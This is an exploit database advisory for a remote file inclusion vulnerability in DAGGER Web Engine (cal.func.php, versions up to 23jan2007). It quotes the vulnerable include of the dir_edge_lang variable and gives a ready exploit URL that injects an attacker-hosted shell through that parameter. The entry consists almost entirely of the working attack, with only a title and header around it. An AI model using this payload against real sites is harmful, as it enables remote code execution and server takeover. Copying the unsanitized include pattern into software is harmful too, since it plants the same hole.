DAGGER Web Engine <= 23jan2007 Remote File Inclusion Vulnerability

2007-06-24T00:00:00
ID 1337DAY-ID-1968
Type zdt
Reporter Katatafish
Modified 2007-06-24T00:00:00

Description

Exploit for unknown platform in category web applications

                                        
                                            ==================================================================
DAGGER Web Engine <= 23jan2007 Remote File Inclusion Vulnerability
==================================================================



###Dagger-web engine(cal.func.php)Remote File Inclusion###

#download:
http://kent.dl.sourceforge.net/sourceforge/dagger/dagger_r23jan2007.
zip


#code:  (cal.func.php)
include($dir_edge_lang.'cal_lang.inc.php');

#exploit:
http://www.site.com/[path]/cal.func.php?dir_edge_lang=[SHELL]



#  0day.today [2018-03-09]  #